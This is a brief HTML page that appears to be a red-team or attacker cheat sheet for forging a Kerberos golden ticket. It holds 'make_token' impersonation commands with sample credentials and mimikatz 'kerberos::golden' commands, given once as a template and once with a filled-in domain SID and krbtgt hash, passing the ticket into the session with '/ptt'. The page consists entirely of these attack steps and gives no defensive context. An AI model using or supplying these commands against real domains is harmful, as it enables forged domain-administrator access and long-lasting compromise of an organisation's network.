<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Golden Ticket</title>
</head><body>Make a sacrificial token<br/>
<br/>
make_token domain\okiedoke PASSw0rd123 <br/>
<br/>
Make Golden Ticket<br/>
<br/>
mimikatz kerberos::golden /user:&lt;username&gt; /domain:&lt;FQDN&gt; /sid:&lt;sid of parent or child domain&gt; /krbtgt:&lt;hash of krbtgt&gt; /ptt <br/>
<br/>
make_token domain\localadmin PASSw0rd123<br/>
<br/>
<br/>
mimikatz kerberos::golden /user:da /domain:domain.local /sid:S-1-5-21-3884802495-1826026284-4176013182 /krbtgt:e16dde5d62196257d6b1e847d746ac69 /ptt </body></html>